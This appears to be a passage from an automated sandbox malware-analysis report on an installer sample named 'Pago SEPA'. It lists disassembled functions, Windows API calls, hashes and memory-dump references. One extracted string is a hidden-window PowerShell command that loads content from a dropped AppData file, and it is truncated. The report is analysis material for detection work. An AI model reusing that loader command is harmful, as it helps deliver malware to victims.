                                                                      • String ID: Error launching installer
                                                                      • API String ID: 3712363035-66219284
                                                                      • Opcode ID: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                      • Instruction ID: 0e3d6bea0253e84bb75e95f5fd13ebb7f1c25267a9e23a2e11a0c59c818b3a51
                                                                      • Opcode Fuzzy Hash: b8225b8e790b3fd0efe802e75bacfbac7fa780f619c07fe13b6fa50099ed031b
                                                                      • Instruction Fuzzy Hash: A1E0BFB4A50209BFEB10AB64ED45F7B77ADE704604F408521BD10F6190D774A9118A79
                                                                      Function 00406B18 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                      • Instruction ID: 5fe4abb7369df3af91b149f2edb7ea720d50bcc67b973f9abb1089395dd24c70
                                                                      • Opcode Fuzzy Hash: f1b0bcb74e89e0527ce0e7aeb25a080aa3b7917c16b08ac734cf8879bcce8d5f
                                                                      • Instruction Fuzzy Hash: C0A14471E00229CBDF28CFA8C8546ADBBB1FF44305F11856AD956BB281C7785A96CF44
                                                                      Function 00406D19 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                      • Instruction ID: 7dc68a506d8d0f3fe9b520a6289ddaa7cfd75a66a39107a8603bac83b987cce9
                                                                      • Opcode Fuzzy Hash: 4d9f9556e65149fb8038c12abebdeeaff41015fbe822045bf8c0f712664e9a4c
                                                                      • Instruction Fuzzy Hash: 58912370D00229CBDF28CFA8C854BADBBB1FF44305F15816AD956BB291C7789A96CF44
                                                                      Function 00406A2F Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                      • Instruction ID: aa61b8b4d6b896fc10b82c5715850ba22d426d73d4dcb40af3c311b95fbd5bbf
                                                                      • Opcode Fuzzy Hash: fedee03a87f183305429df1632bc9847bb667c1ae34a6a4f86b425fb5205d62c
                                                                      • Instruction Fuzzy Hash: 1B815671E00229CFDF24CFA8C844BADBBB1FB44305F25816AD456BB291C7789A96CF54
                                                                      Function 00406534 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                      • Instruction ID: 6afa8d85982321809285efd67767f231e28451523f56623c0a237c64ba690010
                                                                      • Opcode Fuzzy Hash: e8c959f377d96a3870dba63dd65060f52c5bbf460a72db2a5b2be4756d911549
                                                                      • Instruction Fuzzy Hash: 7E816731E00229DBDF24CFA9D844BADBBB0FB44305F11816AE856BB2C0C7785A96DF44
                                                                      Function 00406982 Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                      • Instruction ID: b0afa4bf9b2f32aef8b418d90c6ac84aec3754d6d6600e102a8a9184c58ea877
                                                                      • Opcode Fuzzy Hash: 0a8ee5da33216ad141207925d20784d11e66eebf924bd7a5457e3a8945fa9096
                                                                      • Instruction Fuzzy Hash: FD712471E00229DFDF24CFA8C844BADBBB1FB48305F15806AD846BB290C7395996DF54
                                                                      Function 00406AA0 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                      • Instruction ID: 02d0d75cb83947f83aad45c50880e4a386b83e744e149296eb7fa161ab999f08
                                                                      • Opcode Fuzzy Hash: 62bad76ded8dc27f8eed87459cf3b90d4506ad753805ad6fcc8c39a10a3f4707
                                                                      • Instruction Fuzzy Hash: 08714671E00219CFDF24CFA8C844BADBBB1FB44305F15806AD856BB290C7385956DF44
                                                                      Function 004069EC Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                      • Instruction ID: eb15c3353e008649bdc799d0a197d89dfb60748dd6a42a5e4cae05a50034cddc
                                                                      • Opcode Fuzzy Hash: aa3d38d161a72bddb6f80e1dac2624ab657c9951173fd352498b2eb393463e7a
                                                                      • Instruction Fuzzy Hash: 67714571E00229DBDF28CF98C844BADBBB1FF44305F11806AD956BB291C7789A66DF44
                                                                      Function 00401B37 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00401BA7
                                                                      • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401BB9
                                                                      Strings
                                                                      • "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen, xrefs: 00401B5E, 00401B64, 00401B7E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: Global$AllocFree
                                                                      • String ID: "powershell.exe" -windowstyle minimized "$Alkamine36=Get-Content -Raw 'C:\Users\user\AppData\Local\skydedrene\Nitallernes\sammen
                                                                      • API String ID: 3394109436-2170860038
                                                                      • Opcode ID: a82634369664395a32d5951a50e6f1b5a10201841b9bf8d860b13a3c12bda3fe
                                                                      • Instruction ID: 6437723b9896d782a6b7fabab6bc3621d1df67fb8e76a078729fc3794235ac76
                                                                      • Opcode Fuzzy Hash: a82634369664395a32d5951a50e6f1b5a10201841b9bf8d860b13a3c12bda3fe
                                                                      • Instruction Fuzzy Hash: 5D219672610102ABCB20EFA4CD8595EB7F5EF44314725403BF606B72D1DB7898519F9D
                                                                      Function 004057C8 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00405BCF: GetFileAttributesW.KERNELBASE(?,?,004057D4,?,?,00000000,004059AA,?,?,?,?), ref: 00405BD4
                                                                        • Part of subcall function 00405BCF: SetFileAttributesW.KERNELBASE(?,00000000), ref: 00405BE8
                                                                      • RemoveDirectoryW.KERNELBASE(?,?,?,00000000,004059AA), ref: 004057E3
                                                                      • DeleteFileW.KERNEL32(?,?,?,00000000,004059AA), ref: 004057EB
                                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405803
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: File$Attributes$DeleteDirectoryRemove
                                                                      • String ID:
                                                                      • API String ID: 1655745494-0
                                                                      • Opcode ID: b6c9e388321ce1c96275a05dc803513c5bf951cc4d2342509a9d6f8351b9d3be
                                                                      • Instruction ID: 4a1556df6e167e4727bc7f40320860e210b77304fa0693aaa04bcc3abbce102b
                                                                      • Opcode Fuzzy Hash: b6c9e388321ce1c96275a05dc803513c5bf951cc4d2342509a9d6f8351b9d3be
                                                                      • Instruction Fuzzy Hash: AAE0E532109A5196C21067358808A5F2A94DF86315F054936F856B31C1D37858469ABF
                                                                      Function 00401F1D Relevance: 3.1, APIs: 2, Instructions: 63memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 004063F5: GetModuleHandleA.KERNEL32(?,?,00000020,004032D6,00000009,SETUPAPI,USERENV,UXTHEME), ref: 00406407
                                                                        • Part of subcall function 004063F5: GetProcAddress.KERNEL32(00000000,?), ref: 00406422
                                                                      • GetFileVersionInfoSizeW.KERNELBASE(00000008,00000000,?,000000EE), ref: 00401F33
                                                                      • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F52
                                                                        • Part of subcall function 00405F66: wsprintfW.USER32 ref: 00405F73
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: AddressAllocFileGlobalHandleInfoModuleProcSizeVersionwsprintf
                                                                      • String ID:
                                                                      • API String ID: 2520467145-0
                                                                      • Opcode ID: e7301913e0a94479073cab8ae1a61c2435ab6353f624b5f5e8d51b98023cedd8
                                                                      • Instruction ID: 2eeca60634cad6beb8d14c100b6bedd6a8b915df4911e7a8065b20a4dbf36ab1
                                                                      • Opcode Fuzzy Hash: e7301913e0a94479073cab8ae1a61c2435ab6353f624b5f5e8d51b98023cedd8
                                                                      • Instruction Fuzzy Hash: E1114771A00209BFDB00DFA5CC85EAEBBB5EF44314F10403AF504F62A1EB748A40DB64
                                                                      Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A5C8,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091341496.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_400000_Pago SEPA.jbxd
                                                                      Similarity
                                                                      • API ID: CloseOpenQueryValue
                                                                      • String ID:
                                                                      • API String ID: 3677997916-0
                                                                      • Opcode ID: b40fe6f0dc79027b05799e013f3f7e439734db4c02ce42f3ab54d2d3a1bf2c18
                                                                      • Instruction ID: 318f25c97078b56e75ac6278506f01b5a34a300aa28fb7ae5d2085b0d3939190
                                                                      • Opcode Fuzzy Hash: b40fe6f0dc79027b05799e013f3f7e439734db4c02ce42f3ab54d2d3a1bf2c18
                                                                      • Instruction Fuzzy Hash: F7117331915205EFDB14CFA4DA489BEB7B4EF44354F20843FE405B72D0D6B85A41DB5A
                                                                      Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                      • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2091062459.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000000.00000002.2091042545.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091079709.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2091097019.0000000000445000.00000004.00000001.01000000.00000003.sdmpDownload File
